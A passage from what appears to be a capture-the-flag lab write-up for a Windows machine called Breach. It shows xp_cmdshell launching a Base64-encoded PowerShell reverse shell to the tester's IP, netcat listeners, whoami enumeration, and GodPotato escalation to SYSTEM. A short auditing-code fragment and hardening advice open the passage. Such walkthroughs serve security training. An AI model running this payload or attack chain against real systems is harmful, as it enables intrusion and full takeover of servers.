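    for alert in audit_errorlog(SAMPLE_ERRORLOG):
        print(alert["time"], alert["spid"], alert["severity"], alert["event"])
```

The spid ties the change back to the session, and the session's login can be resolved from the default trace or from an Audit on SERVER_OPERATION_GROUP. Enabling xp_cmdshell requires sysadmin, which is exactly why an Administrator-impersonating ticket was needed; granting that role to fewer principals, and running the instance under a low-privilege service account, bounds what a successful enable buys.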
Now grab the PowerShell #3 Base64 payload from reverse.com
SQL (BREACH\Administrator dbo@master)> EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA3AC4ANQAwACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Then we get a shell as svc_mssql.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.17.50] from (UNKNOWN) [10.129.249.166] 56999
whoami
breach\svc_mssql
PS C:\Windows\system32>
Privilege Escalation
I enumerate the groups and privileges.
PS C:\Windows\system32> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
It's worth noting "Mandatory Label\High Mandatory Level", which means the process is running at high integrity (elevated past UAC), and that "SeAssignPrimaryTokenPrivilege" and "SeImpersonatePrivilege" are the classic prerequisites for token-impersonation privilege escalation.
Hence, let's use GodPotato to escalate our privileges and get a reverse shell as nt authority\system (again using the PowerShell #3 Base64 payload from reverse.com).
PS C:\programdata> .\GodPotato.exe -cmd 'powershell -e [...]'
Then we get a shell as nt authority\system.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.17.50] from (UNKNOWN) [10.129.249.166] 57081
whoami
nt authority\system
Description
Breach (medium, Windows): guest SMB write access is used to capture NTLMv2 hashes and obtain a low-privileged domain account. A kerberoastable svc_mssql service account is discovered and cracked; with it a Silver Ticket is forged to impersonate Administrator and access MS-SQL. xp_cmdshell yields remote code execution as svc_mssql, and final escalation abuses SeImpersonatePrivilege.